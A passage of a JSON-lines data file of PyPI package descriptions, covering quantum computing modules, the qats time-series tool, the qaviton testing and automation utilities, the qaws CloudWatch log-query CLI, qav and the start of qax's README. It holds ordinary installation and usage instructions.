executing quantum programs.PrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install qlmaasLicenseAtos myQLM EULA"} +{"package": "qatrah", "pacakge-description": "QatraH | \u0642\u0637\u0631\u0629 | (Droplet)Using quantum computing to design a more precise, environmental friendly and robust water distribution network and debugging.QatraH Website LinkNYUAD Hackathon for Social Good in the Arab World: Focusing on Quantum Computing (QC) and UN Sustainable Development Goals (SDGs).https://nyuad.nyu.edu/en/events/2023/april/nyuad-hackathon-event.htmlPresentationThe Slides can be viewed atinformation.MotivationSolving quantum solution for water based distibution and debugging using quantum computing.\nBuzz words: WDN, Quantum Computing, QUBO, QML, Optimization, Pennylane, JaxQuantum algorithm:Variational Quantum Eigensolver (VQE)Quantum Approximate Optimization Algorithm (QAOA)Quantum Machine Optimization AlgorithmQuantum Machine Learning on GraphInstallation Instructions:Requirements:pip3 install -r requirements.txt*Conda users, please make sure toconda install pipand use it for the above requirements.Input to the program:Sensor readingsPaths from source to sensorDataset of the water sample like from DEWA site under paywallReplacing Classical Pressure Sensors with Optimized Quantum SensorsCompared to classical pressure sensors, quantum sensors are not invasive. They are also tolerant to the changes in the environment around it while also being more accurate. This improves the ability to detect pipe leakage.Leak Detection and LocalizationLeakage in water distribution systems has been a challenge for water management committees. The real-life data collected from the optimal placed sensors, can be used to predict and localise leakage by identifying the deviations of pressure in the network. This task can be done both using QUBO and Quantum Machine Learning based models.Using Quantum Machine LearningExisting classical literature, suggests the use of machine learning to predict leakage and localise it to a particular pipe using the data from pressure sensors in the WDN at any given point of time. We attempt to solve the same using a quantum machine learning based model.Specifically, we collect the pressure data from the optimally-placed sensors in a water distribution network to predict leakage in the WDN using a quantum neural network. It is implemented in the Pennylane framework using Jax. The data is fed into the model using Angle encoding. The model is composed of a parametrised quantum circuit with RY, RZ and CNOT gates which are trained over a total of 500 epochs. We use a train to test-set ratio of 4:1 and optimise the model using Rectified adam over the binary cross-entropy loss. At the end we obtain a test accuracy of 87.02% over the dataset of size 650.AcknowledgementsHackers:Anas,Basant,Mohammed,Airin,Lakshika,Sanjana,Selin Doga,YaserMentors:Fouad,El Amine,Victory Omole,Akash KantAnd thank you to the oragnising committee of NYUAD 2023 Hackathonhttps://nyuad.nyu.edu/en/events/2023/april/nyuad-hackathon-event.htmland Qbraid and other student who made it possible and great."} +{"package": "qats", "pacakge-description": "QATSPython library and GUI for efficient processing and visualization of time series.GeneralAboutThe python library provides tools for:Import and export from/to various pre-defined time series file formatsSignal processingInferring statistical distributionsCycle counting using the Rainflow algorithmIt was originally created to handle time series files exported fromSIMOandRIFLEX. Now it also\nhandlesSIMAhdf5 (.h5) files,\nMatlab (version < 7.3) .mat files, CSV files and more.QATS also features a GUI which offers efficient and low threshold processing and visualization of time series. It is\nperfect for inspecting, comparing and reporting:time seriespower spectral density distributionspeak and extreme distributionscycle distributionsDemoGetting startedInstallationRun the below command in a Python environment to install the latest QATS release:python -m pip install qatsTo upgrade from a previous version, the command is:python -m pip install --upgrade qatsYou may now import qats in your own scripts:>>>fromqatsimportTsDB,TimeSeries... or use the GUI to inspect time series.New in version 5.0.0.TheQtbindingPySide6is installed withqats.\nIf you would rather like to usePyQt6, runpython -m pip install pyqt6If multiple Qt bindinds are installed, the one to use may be controlled by setting the environmental variableQT_APIto the desired package. Accepted values includepyqt6(to use PyQt6) andpyside6(PySide6). For more details, seeREADME file for qtpy.The GUI may now be launched by:qats appTo create a start menu link, which you can even pin to the taskbar to ease access to the\nQATS GUI, run the following command:qats config --link-appTake a look at the resources listed below to learn more.New in version 4.11.0.The command line interface is also accessible by running Python with the '-m' option. The following commands are equvivalent to those above:python -m qats apppython -m qats config --link-appResourcesSourceIssuesChangelogDocumentationDownloadContributeThese instructions will get you a copy of the project up and running on your local machine for development and testing\npurposes. See deployment for notes on how to deploy the project on a live system.PrerequisitesInstall Python version 3.8 or later from eitherhttps://www.python.orgorhttps://www.anaconda.com.Install Poetry withthe official installer.Install thepoetry-dynamic-versioningplugin:poetry self add \"poetry-dynamic-versioning[plugin]\"Clone the source code repositoryAt the desired location, run:git clone https://github.com/dnvgl/qats.gitInstallingTo get the development environment running...poetry installThis willcreate an isolated environmentinstall all dependencies including those required for development, testing and building documentationand install the package in development (\"editable\") modeYou should now be able to import the package in the Python console,>>>importqats>>>help(qats)... and use the command line interface (CLI).qats -hNew in version 4.11.0.The CLI is also available frompython -m qats -hRunning the testsThe automated tests are run usingunittest.python -m unittest discoverBuilding the packageBuild tarball and wheel distributions bypoetry buildThe builds appear in the.distfolder. The distributions adhere to thePEP 0427convention{distribution}-{version}(-{build tag})?-{python tag}-{abi tag}-{platform tag}.whl.Building the documentationThe html documentation is built usingSphinxsphinx-build -b html docs\\source docs\\_buildTo force a build to read/write all files (always read all files and don't use a saved environment), include the-aand-Eoptions:sphinx-build -a -E -b html docs\\source docs\\_buildVersioningWe apply the \"major.minor.micro\" versioning scheme defined inPEP 440. See alsoScheme choicesonhttps://packaging.python.org/.Versions are tagged with Git tags likev3.0.1. See thetags on this repository.Release and deploymentWe use therelease cycle in GitHubto cut new releases.Once a new release is published,GitHub Actionstakes care of the packaging, unit testing and deployment toPyPi.The workflows for continuous integration and deployment are found in.github/workflows.AuthorsPer Voie-tovopErling Lone-eneeloLicenseThis project is licensed under the MIT License - see theLICENSEfile for details."} +{"package": "qattools", "pacakge-description": "No description available on PyPI."} +{"package": "qat-variational", "pacakge-description": "Module qat-variationalThis moduleqat-variationalis part ofmyQLMproject. myQLM is a quantum\nsoftware stack for writing, simulating, optimizing, and executing quantum programs. This module\nprovides tools to define and manipulate variational quantum algorithm.PrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install myqlmLicensemyQLM EULA"} +{"package": "qAuth-rasa97", "pacakge-description": "No description available on PyPI."} +{"package": "qautils", "pacakge-description": "Code Metrics by sonarqubePython tested versions3.63.53.43.33.22.7SupportedSupportedSupportedNot SupportedNot SupportedSupportedHow to install ?Install from PIP file :pip install qautilsInstall from setup.py file :python setup.py installHow to exec tests ?Tests from setup.py file :python setup.py testGetting StartedJust starting example of usage before readUsage Guide.fromqautils.filesimportsettings# file_path = './' by defaultSETTINGS=settings(file_path=\"/home/user/config/dir/\",file_name=\"settings.json\")KEY_TO_CHECK=\"some_json_key_name\"try:print(SETTINGS[KEY_TO_CHECK])exceptExceptionaserr:print(\"ERROR:{}\".format(err))finally:bot.close()ContributingWe welcome contributions toqautils! These are the many ways you can help:Submit patches and featuresMakeqautils(new updates for community)Improve the documentation forqautilsReport bugsAnddonate!Please read ourdocumentationto get started. Also note that this project\nis released with acode-of-conduct, please make sure to review and follow it."} +{"package": "qauto.makefile", "pacakge-description": "No description available on PyPI."} +{"package": "qauto.makefile.machine-action.avast", "pacakge-description": "No description available on PyPI."} +{"package": "qauto.result-reporter", "pacakge-description": "No description available on PyPI."} +{"package": "qav", "pacakge-description": "Question Answer Validation (qav)qav is a Python library for console-based question and answering, with the\nability to validate input.It provides question sets to group related questions. Questions can also\nhave subordinate Questions underneath them. Answers to those questions can be\nvalidated based on a simple, static piece of information provided by you.\nAnswers may also be validated dynamically based on the information provided in\nprevious questions.Example Usage>>> from qav.questions import Question\n>>> from qav.validators import ListValidator\n>>> q = Question('How old am I? ', 'age', ListValidator(['20', '35', '40']))\n>>> q.ask()\nPlease select from the following choices:\n [0] - 20\n [1] - 35\n [2] - 40\nHow old am I? : 0\n>>> q.answer()\n# returns => {'age': '20'}RequirementsnetaddrInstallation$ pip install qavCompatibilityThis library has been tested to support:Python 3.6It most likely will still run on Python 2.7, but official support has been dropped.Licenseqav - question answer validation in Python\nCopyright (C) 2015 UMIACS\n\nThis library is free software; you can redistribute it and/or\nmodify it under the terms of the GNU Lesser General Public\nLicense as published by the Free Software Foundation; either\nversion 2.1 of the License, or (at your option) any later version.\n\nThis library is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\nLesser General Public License for more details.\n\nYou should have received a copy of the GNU Lesser General Public\nLicense along with this library; if not, write to the Free Software\nFoundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n\nEmail:\n github@umiacs.umd.edu"} +{"package": "qavifiserver", "pacakge-description": "qifimanager"} +{"package": "qaviton", "pacakge-description": "The first open source project to facilitate a unified testing automation framework for Web, Mobile & IoT\nwith Machine Learning, AI and much more:https://www.qaviton.comInspired by Appium & Selenium, Qaviton is a play on words for Graviton.\nIn theories of quantum gravity, the graviton\nis the hypothetical elementary particle that mediates the force of gravity.\nQaviton is like the Graviton in the sense that if it exists,\nit will be the solution to a fundamental problem in its field.Qaviton offers an easy framework to automate tests that can run against any driver or any testing scenario,\nand is meant to be like the React Native of software testing.Installingmake sure you have python 3.7+ installed.we recommend using venv:python -m venv venv\nsource venv/bin/activate || venv\\\\Scripts\\\\activateInstall and update usingpip:pip install -U qavitonto exit your virtual environment:(venv) path/to/tests>deactivateSimple Examplespython-mqavitoncreatewebtestspython-mqavitoncreateweb,mobiletestspython-mqavitoncreatewebtests--examplepython-mpytesttests$ python -m qaviton create tests\n * creating qaviton tests\n * your testing framework is done!\n * start testing like a boss \u269b\n * ______________\n * / __________ \\ ______\n * / / \\ \\ / ____ \\\n * / / \\ / \\ \\ / / \\ \\ __ __ _ ___________ _______ _ _\n * | | O \\ / O | | / |______| \\ \\ \\ / / |_| |____ ____| / _____ \\ | \\ | |\n * | | | | | ________ | \\ \\ / / |-| | | | | | | | \\ | |\n * \\ \\ \\________/ / \\ | | | | \\ \\ / / | | | | | | | | | | \\ | |\n * \\ \\____________/ /\\ \\_ | | | | \\ \\/ / | | | | | |_____| | | |\\ \\| |\n * \\________________/ \\__| |_| |_| \\__/ |_| |_| \\_______/ |_| \\___|run tests with local hubinstall docker:https://docs.docker.com/install/install selenoid:\ngo to option 2 to install with dockerhttps://github.com/aerokube/selenoid/blob/master/docs/quick-start-guide.adocgo to your secret file and change your hub url to local host:/project/tests/data/secret.pyhub=\u2019http://localhost:4444/wd/hub\u2019CommunityPlease checkout our public test repository at:https://github.com/qaviton/test_repositoryThe Qaviton team wants to contribute and share testing experience.\nYou can use our tests and utilities in your project\nand even share your own tests code, functions and experience.Be part of something big.ContributingFor guidance on setting up a development environment and how to make a\ncontribution to Qaviton, see thecontributing guidelines.DonateThe Qaviton organization develops and supports qaviton and the libraries\nit uses. In order to grow the community of contributors and users, and\nallow the maintainers to devote more time to the projects,please\ndonate today.LinksWebsite:https://www.qaviton.comDocumentation:https://github.com/qaviton/qaviton/blob/master/docs/License:Apache License 2.0Releases:https://pypi.org/project/qaviton/Code:https://github.com/qaviton/qavitonIssue tracker:https://github.com/qaviton/qaviton/issuesTest status:Linux, Mac:https://travis-ci.org/qaviton/qavitonWindows:https://ci.appveyor.com/project/qaviton/qavitonTest coverage:https://codecov.io/gh/qaviton/qaviton"} +{"package": "qaviton-git", "pacakge-description": "Qaviton Gitsuper light! super powerful! git wrapperInstallationpipinstall--upgradeqaviton_gitRequirementsgit 2.16+Python 3.6+Usagefromqaviton_gitimportGitrepo=Git.clone(path='',url='https://github.com/qaviton/qaviton_git.git',username='xxxx',password='xxxx',email='xx@x.x')withopen('newfile','w')asf:f.write('rock git hard')repo.commit('new file').push()"} +{"package": "qaviton-handlers", "pacakge-description": "Qaviton Handlerserror handling utilitiesInstallationpipinstall--upgradeqaviton_handlersRequirementsPython 3.6+Featuresretry decorator \u2713retry with context \u2713try functions \u2713catch errors \u2713simple Exception wrapper \u2713Usagedefretry(tries=3,delay=0,backoff=1,jitter=0,max_delay=None,exceptions=Exception,logger:Logger=log):\"\"\"Retry function decorator \\ try a context of actions until attempts run out:param exceptions: an exception or a tuple of exceptions to catch. default: Exception.:param tries: the maximum number of attempts: -1 (infinite).:param delay: initial delay between attempts. default: 0.:param max_delay: the maximum value of delay. default: None (no limit).:param backoff: multiplier applied to delay between attempts. default: 1 (no backoff).fixed if a number, random if a range tuple (min, max), functional if callable (function must receive **kwargs):param jitter: extra seconds added to delay between attempts. default: 0.fixed if a number, random if a range tuple (min, max), functional if callable (function must receive **kwargs):param logger: logger.warning(fmt, error, delay) will be called on failed attempts.default: retry.logging_logger. if None, logging is disabled.\"\"\"retry decoratorfromqaviton_handlers.try_decoratorimportretry@retry()deffoo():n=int('1'+input('select number:'))print(n)foo()retry with contextfromqaviton_handlers.try_contextimportretrywithretry()astrying:whiletrying:withtrying:print(\"Attempt #%dof%d\"%(trying.attempt,trying.attempts))raiseusing different try wrapper functionsfromqaviton_handlers.try_functionsimporttry_to,try_or_none,multi_try,multi_try_no_breakdeffoo(a=0):print(float(a+input(\"select number:\")))# simply trytry_to(foo,1)try_to(foo,2)try_to(foo,3)# get the errorerror=try_to(foo,4)iferror:print(error)# if error occurrediftry_to(foo,5):try_to(foo,5)# try with key argumentsr=try_to(lambdaa,b,c:a*b*c,1,kwargs={'b':2,'c':3})print(r)# try to get a numbernumber=try_or_none(lambdaa:float(a+input(\"select number:\")),6)ifnumber:print(number)# try many functions, return a list of results, or an error# if an error occurred, the multi try stopsmulti_try(lambda:foo(10),lambda:foo(11),)# specify errors to ignoreresponse=multi_try(lambda:foo(13),lambda:foo(14),exceptions=Exception,)# handle the errorresponse=multi_try(lambda:foo(13),lambda:foo(14),)ifisinstance(response,Exception):...# try many functions, return a list of results, some may be errors# if an error occurred, the multi try continuesmulti_try_no_break(lambda:foo(8),lambda:foo(9),lambda:foo(0),)ignore errors now so you can handle them laterfromqaviton_handlers.catchimportCatchfromqaviton_handlers.utils.errorimportErrorcatch=Catch(store=True)# catch an errortry:1+'1'exceptExceptionase:catch(e)# a cleaner syntaxwithcatch:1+'1'2+'2'# ignore the errorwithCatch():5*'e'print(f\"caught{catch.count}errors\")print(f\"caught first{catch.first}\")print(f\"caught last{catch.last}\")# make your own CatchclassMyCatch(Catch):defhandler(self,e):self.stack.add(Error(e))ifself.log:self.log.warning(f\"I caught{e}\")returnself"} +{"package": "qaviton-helpers", "pacakge-description": "qaviton helpersa collection of nice objects and functions to make things simple"} +{"package": "qaviton-io", "pacakge-description": "Qaviton IOQaviton IOis a package with a simple API, making use of python's async & multiprocessingto enable fast execution of many asyncable operations.Installationpipinstallqaviton-io-URequirementsPython 3.6+Featuresasync task managerprocess task managertask loggerUsageasync manager:fromtimeimporttimefromrequestsimportget# lets make use of requests to make async http callsfromqaviton_ioimportAsyncManager,task# let's create an async managerm=AsyncManager()# first we make a simple function to make an http call.# we want to log the result,# and make sure that in case of an exception# the manager won't stop@task(exceptions=Exception)deftask():returnget(\"https://qaviton.com\")# this will run async tasks and measure their durationdefrun(tasks):t=time()m.run(tasks)t=time()-tprint(f'took{round(t,3)}s')# let's run our task once and see how long it takesrun([taskfor_inrange(1)])# now let's run our task 20 times and see how long it takesrun([taskfor_inrange(20)])# we can assert the collected results hereassertlen(m.results)==21forrinm.results:assertr.status_code==200# let's view the results in the log reportm.report()process manager:\"\"\"make sure your tasks are defined at the module level,so they can be pickled by multiprocessing\"\"\"fromtimeimporttimefromrequestsimportgetfromqaviton_io.typesimportTasksfromqaviton_ioimportProcessManager,taskfromtracebackimportformat_exc# now we make some tasks# this is a nested task# we don't want to handle any exceptions# so in case of failure the parent will not proceed@task()deftask1(url):r=get(url)r.raise_for_status()# this is the prent task# we want to handle all exceptions# so in case of failure the next task will execute@task(exceptions=Exception)defmulti_task():forurlin[\"https://qaviton.com\",\"https://qaviton.co.il\",# make sure you enter a valid address\"https://qaviton.com1\",# make sure you enter a valid address]:task1(url)# let's create a function to execute tasksdefexecute_tasks(tasks:Tasks,timeout):manager=ProcessManager()t=time()try:manager.run_until_complete(tasks,timeout=timeout)timed_out=NoneexceptTimeoutError:timed_out=format_exc()t=time()-tmanager.report()print(f'took{round(t,3)}s\\n')manager.log.clear()returntimed_out# now all that's left is to run the tasksif__name__==\"__main__\":timeouts=[execute_tasks([multi_taskfor_inrange(1)],timeout=3),execute_tasks([multi_taskfor_inrange(20)],timeout=6),execute_tasks([multi_taskfor_inrange(80)],timeout=9),]fortimeoutintimeouts:iftimeout:print(timeout)notes:for good performance and easy usageyou should probably stick with using the AsyncManagerThe ProcessManager uses async operations as well as multi-processing.It distributes tasks across cpus, and those tasks are executed using the AsyncManagerif you want maximum efficiency you should consider using the ProcessManagerThe ProcessManager uses the multiprocessing moduleand should be treated with it's restrictions & limitations accordinglyThe ProcessManager gets stuck easily,make sure to use timeouts when using it"} +{"package": "qaviton-log", "pacakge-description": "Qaviton LogQaviton LogIts a simple wrapper to the logging module.With easy API of logging to a file or to the console.Usagefromqaviton_logimportLoggerlog=Logger(file='log')log.info('hi')log.warning('bye')"} +{"package": "qaviton-monitors", "pacakge-description": "Qaviton Monitorsat the moment this library contains a simple monitoring scriptfor measuring:memorydiskcpurunning processesnetwork bandwidthInstallationpipinstall--upgradeqaviton_monitorsRequirementsPython 3.6+Featuressimple monitor script \u2713(more features might be added on demand) *Usageactivating simple monitor script# app.pyfromqaviton_monitors.simple_monitorimportmonitormonitor()Press Enter to stop monitoring\n\n\n======================== Monitor ========================\n\nLast Boot: 'boot_time'\nSystem Uptime: 'uptime'\n\nCPU Cores cpu_count\nMEMORY total mGB | used mGB | free mGB\nDISK total dGB | used dGB | free dGB\n\n%(asctime)s | CPU n% MEMORY n% DISK n% Running Processes n NetIO i:o GBs\n%(asctime)s | CPU n% MEMORY n% DISK n% Running Processes n NetIO i:o GBs\n%(asctime)s | CPU n% MEMORY n% DISK n% Running Processes n NetIO i:o GBs"} +{"package": "qaviton-package-manager", "pacakge-description": "Qaviton Package ManagerQaviton Package Manager (qpm)is a package management tool integrated with git.to enable management of packages both public & private,from git repositories, in addition to the standard package manager.Replace redundant packaging systems using qpm:Package everything using git tags:>qpm --build\n |\nbranch: dev\n |\nbranch: tests\n | \n[tag 2019.9.1] \n |\n[tag 2019.9.2]\n |\nbranch: release/latest\n\n\n>qpm --install \"git+https://url/owner/project.git@release/latest#egg=package:>=2019.9.2\"\n | | | | | | | |\nqaviton install vcs+protocol://project_url @branch #egg=package (optional) \npackage method type directory pep-440 pep-508\nmanager path :version_specifierInstallationpipinstall--upgradeqaviton_package_managerRequirementsgit 2.16+Python 3.6+FeaturesCI CD workflow \u2713managing private+public packages \u2713managing nested private packages \u2713cli + scripting \u2713pip capabilities \u2713git capabilities \u2713pypi capabilities \u2713automatic builds \u2713secure credentials \u2713cross-platform \u2713nested/multiple packages \u2717pip -e installs \u2717 (coming soon)docker build \u2717 (but can be used with the run function)docker push \u2717 (but can be used with the run function)Usagecreating a manager:(venv) windows> qpm ^\n--create ^\n--url \"https://github.com/owner/project.git\" ^\n--username \"user1\" ^\n--password \"pass@#$\" ^\n--email \"awsome@qaviton.com\" ^\n--pypi_user \"supasayajin\" ^\n--pypi_pass \"final space\"(venv)bash$qpm\\--create\\--url\"https://github.com/owner/project.git\"\\--username\"user1\"\\--password\"pass@#$\"\\--email\"awsome@qaviton.com\"\\--pypi_user\"supasayajin\"\\--pypi_pass\"final space\"\\/this should leave you with the following project structure:project/\n \u251c package/\n \u2502 \u2514 __init__.py # with __author__, __version__, __author_email__, __description__, __url__, __license__\n \u251c tests/\n \u2502 \u2514 __init__.py\n \u251c .gitignore\n \u251c LICENSE \n \u251c README.md\n \u251c requirements.txt\n \u251c requirements-test.txt\n \u251c setup.py\n \u2514 package.py # ignored by .gitignorenow let's build a package:# package.pyfromqaviton_package_managerimportManagerfromqaviton_package_managerimportdecypt# if this is not secure enough, you can add cache_timeout=3600# and store credentials in memory# manager = Manager(cache_timeout=3600)# and we need to insert the credentials in run time: > python package.py --username \"x\" --password \"z\"manager=Manager(**decypt(key=b'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx==',token=b'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx==',))if__name__==\"__main__\":# running with lambdas will protect you from processes getting stuckmanager.run(lambda:manager.update(),# pip install -r requirements.txt --upgradelambda:manager.update_test(),# pip install -r requirements-test.txt --upgradelambda:manager.test(),# python -m pytest --junitxml=test_report.xml testslambda:manager.build(),# git commit, tag & push (internal logic is more complicated)lambda:manager.upload(),# upload to pypi)make sure you have at list 1 passing test for your package# tests/my_package_test.pydeftest_with_100p_coverage():print(\"testing my package!\\nPASS\")# we can now create a packagepythonpackage.pyCLI:we can call any method and send any parameter to the manager through cli:# release a version if all tests passqpm--username\"\"--password\"\"--update--update_test--test--build--upload# build a stable version if all tests passqpm--username\"\"--password\"\"--update--update_test--test--build\"stable/latest\"# install cachetools using pip and save the requirement in requirements.txtqpm--installcachetools# cache credentials in memoryqpm--username\"\"--password\"\"--cache_timeout\"-1\"# using the system & python to execute testsqpm--test\"system\"\"echo success\"--test\"python\"\"-c\"\"print(\\\"py success\\\");\"CLI shortcuts:we can call any method and send any parameter to the manager through cli:# install cachetools using pip and save the requirement in requirements.txtqpmicachetools# uninstall cachetools using pip and remove the requirement in requirements.txtqpmuncachetools# build a stable versionqpmb\"stable/latest\"# run testsqpmt# upload to pypiqpmup# install cachetools using pip and save the requirement in requirements.txtqpminstallcachetools# build packageqpmbuild\"stable/latest\"# upload to pypiqpmuploadScript:# ci_cd.pyfromqaviton_processesimportrun,escape,pythonfrompackageimportmanagerfromdatetimeimportdatetimed=datetime.utcnow()docker_url=manager.vars['docker_url']docker_user=manager.vars['docker_user']docker_pass=manager.vars['docker_pass']docker_email=manager.vars['docker_email']SSH_PRIVATE_KEY=manager.kwargs['SSH_PRIVATE_KEY']docker_tag=manager.kwargs['docker_tag']branch_build=\"ci_cd/latest\"dev_branch=\"dev\"manager.run(lambda:manager.should_build(from_branch=dev_branch,to_branch=branch_build),lambda:manager.install(),lambda:manager.install_test(),lambda:manager.test.pytest(\"tests/ci_cd\"),lambda:manager.build(to_branch=branch_build,version=f'{d.year}.{d.month}.{d.day}'),# docker distributelambda:run(f\"docker login --username=\\\"{escape(docker_user)}\\\"--password=\\\"{escape(docker_pass)}\\\"--email=\\\"{escape(docker_email)}\\\"\\\"{escape(docker_url)}\\\"\"),lambda:run(f\"docker build --force-rm -t test-multi-stage-builds --build-arg SSH_PRIVATE_KEY=\\\"{escape(SSH_PRIVATE_KEY)}\\\".\"),lambda:run(f\"docker tag{docker_tag}yourhubusername/verse_gapminder:firsttry\"),lambda:run(\"docker push yourhubusername/verse_gapminder\"),# deploy scriptlambda:python(\"deploy.py\"))# schedualer.pyfromtimeimporttime,sleepfromdatetimeimportdatetime,timedeltafromqaviton_processesimportpython_code_asyncd=datetime.utcnow()date=datetime(year=d.year,month=d.month,day=d.day,hour=22)delta=timedelta(days=1)# build a package once a day at 22pmwhileTrue:python_code_async('import ci_cd')date+=deltasleep(date.timestamp()-time())warningsthis manager is meant for automated ci cd purposesand should not be used instead of regular git commit/push/merge.make sure to avoid using it on unstable branchesto avoid failed packaging requests or potential data loss.we recommend using it from a CI CD dedicated branch.the manager defaults to encrypted credentials,if encrypted credentials on the disk are not secure enough,please make sure to enable caching, to store credentials in memory"} +{"package": "qaviton-pip", "pacakge-description": "qaviton_pipa pip wrapper for scripting and automation"} +{"package": "qaviton-processes", "pacakge-description": "Qaviton Processessimple python wrappers for different processesInstallationpipinstall--upgradeqaviton_processesRequirementsPython 3.6+Featuresprogrammatic support for automating different processes \u2713system cli wrapper \u2713async support \u2713pip wrappers \u2713git wrappers \u2713python wrappers \u2713pytest wrappers \u2713Usagesfromqaviton_processes.systemimport(run,pip,git,escape,python,python_code,pytest,run_async,pytest_async,python_async,python_code_async,)stdout:bytes=run(f\"echo\\\"{escape(input('say hi:'))}\\\"\")process=run_async(\"cd proj && touch jig.txt\")whileprocess.poll()isNone:...print(process.stdout,process.stderr)git('clone{url}.git')pip('install','qaviton_processes','-U')python('script.py')python_code('import os','if os.path.exist(\"proj\"+os.sep+\"jig.txt\"):',' print(\"awsome!\")')python_async('-m scripts.monitor','log=log.txt')..."} +{"package": "qaviton-proxy", "pacakge-description": "Qaviton ProxyProxy functionality, developed for flask applications.Installationpipinstall--upgradeqaviton_proxyRequirementsPython 3.6+Featuresproxy requests \u2713Usagecreating a flask app# app.pyfromflaskimportFlaskfromqaviton_proxyimportproxyapp=Flask(__name__)@app.route(\"/prox\",methods=['GET'])defclient_session():returnproxy('https://proxied.com')app.run(port=3000)run the apppythonapp.pysend request to appimportrequestsresponse=requests.get('localhost:3000/prox')# send request to appprint(response.json())# got response from 'localhost:3000/prox' which proxied 'https://proxied.com'"} +{"package": "qaviton-ssh", "pacakge-description": "Qaviton SSHmaking ssh super easyInstallationpipinstall--upgradeqaviton_sshRequirementsPython 3.6+Featuressimple ssh send-recieve api \u2713async requests \u2717 (coming soon)multi-session workflow \u2717 (coming soon)Usagecreating an ssh clientfromqaviton_sshimportSSH# hostname is a reachable address for the machine# username is the allowed user to have ssh access# private_key is the file path or string of the private keyclient=SSH(hostname='x.x.x.x',username='username',private_key='pkey.pem')response=client.send('echo \"hello world\"')print(response.data,response.error)# server will respond with b'hello world', b''create a python script on the servercd='cd myproject'file='script.py'response=client.send_many([cd,f'touch{file}',f'echo \"print(\\\"script success\\\")\" >{file}'])assertnotresponse.errorexecute the scriptresponse=client.send_many([cd,f'python{file}'])assertnotresponse.errorprint(response.data)# server will respond with b'script success'"} +{"package": "qaws", "pacakge-description": "qaws - Query AWS LogsCommand line utility for search in AWS CloudWatch Logs with Insights queries and flexible time ranges.Install latest via pip:https://pypi.org/project/qaws.You need Python 3.8 (you can try lower version - not tested)Ensure you have you Python's Bin directory in $PATHExecute \"qaws\" in your command line.StatusImprovement proposalsWildcard should guarantee case insesitive name for group.Default walue for -t set to 1 day.Default value for -q set to \"fields @timestamp, @message | limit 9999\"Add switch to display group names in output.Default value for -g set to all groups?Workaround group amount limit?Workaround \"limit 9999\" limit?Set License to beer license?Validate users input.ManualNAME\n qaws -- Query AWS CloudWatch logs\nSYNOPSIS\n qaws [-g groups...]\n [-t starttime | starttime endtime]\n [-q query]\nDESCRIPTION\n -h --help\n Get this manual.\n -g --groups groups ...\n Specify 1 to N logging groups like \"/ecs/someservice1\". Wildcard * can be used like \"*ecs*some*1\".\n If you specify only -g flag then it will print all groups in CloudWatch\n -t --time starttime | starttime endtime\n Specify starttime in history to more recent endtime in present.\n Possible formats for time specification is:\n ISO time: \"2000-01-01T00:00:00\"\n Epoch in seconds: \"1590314700\"\n Time relative to Now:\n \"1h\" 1 hour ago\n \"1h 60m\" 2 hours ago\n \"1h 60m 3600s\" 3 hours ago\n \"3600s 60m 1h\" 3 hours ago as well (order doesn't matter)\n \"3600s 3600s 3600s\" 3 hours ago as well (items are repeatable)\n \"1y 1mo 1w 1d 1h 1m 1s\" is possible as well\n -g --query query\n Query exactly as it is usually written in AWS CloudWatch Insights in Web Console:\n fields @timestamp, @message\n | filter @message like 'event'\n | limit 10\"\n\n - It can take few minutes (~2 minutes) until logs appears in CloudWatch and therefore fetching logs\n with '-t \"1m\"' may not return any results\n - Even if you set '|limit 1' in --query then CloudWatch will anyway search over entire specified e.g. '-t \"10d\"'\n history which can take lot of time\n - When you use wildcard * in group names then it will take longer to finish query as all the log group names has to be fetched from AWS\nEXAMPLES\n - Prints all log groups in CloudWatch:\n qaws \\\\\n --groups\n - Prints all log groups in CloudWatch matching wildcard:\n qaws \\\\\n --groups \"*service*\"\n - Basic querying:\n qaws \\\\\n --groups \"/ecs/myservice0\" \\\\\n --time \"1h\" \\\\\n --query \"fields @message\"\n - Multiple groups specified with one containing wildcard:\n qaws \\\\\n --groups \"*ecs*service0\" \"/ecs/myservice1\" \"/ecs/myservice2\" \\\\\n --time \"1d 1h 30m\" \\\\\n --query \"fields @message\"\n - Query logs in between past 5 and 1 hour with wildcard:\n qaws \\\\\n --groups \"/ecs/*\" \\\\\n --time \"5h\" \"1h\" \\\\\n --query \"fields @timestamp @message | filter @message like 'event' | limit 9000\"\n - Query logs in between two ISO dates:\n qaws \\\\\n --groups \"/ecs/*\" \\\\\n --time \"2020-05-24T00:00:00\" \"2020-05-24T12:00:00\" \\\\\n --query \"fields @message | filter @message like 'event' | limit 9000\"\n - Combine relative time with ISO date:\n qaws \\\\\n --groups \"/ecs/*\" \\\\\n --time \"1y\" \"2020-05-24T00:00:00\" \\\\\n --query \"fields @message | filter @message like 'event' | limit 9000\"\nAUTHORS\n Jiri Kacirek (kacirek.j@gmail.com) 2020\nIMPLEMENTATION\n Python 3.8"} +{"package": "qax", "pacakge-description": "Qax: If it quacks like a tensor...\ud83e\udd86Qax\ud83e\udd86 is a tool for implementing types which represent tensors, but may or may not be instantiated as a single dense array on your GPU. Examples of this include:Quantization: A 4-bit array of integers + a small number of scale values are used to represent a full 16/32-bit arrayLoRA: An array $W$ is replaced by the array $(W + BA^T)$ so that $A$ and $B$ may be trained while leaving $W$ frozenSymbolic zeros/constants: For arrays which will consist entirely of a single repeated value, simply store that single value and the shape of the arrayCustom kernels: If you have a custom kernel and want to use it with existing models without modifying them, Qax is an easy way to do soHopefully many more things!The goal of Qax is to make implementing custom JAX behavior much easier, so that users won't need to deal with all the details of writing a full JAX transform. All you need to do to get custom representations is:Define what data/metadata your datatype should containOptionally write any number of handlers which specify how your type behaves under JAX primitives such as multiplicationWrite a function which constructs a dense array from your implicit representationBoth of the above are written in pure JAX, so no need for custom gradients (unless you want to of course!).Installationpip install qaxExample 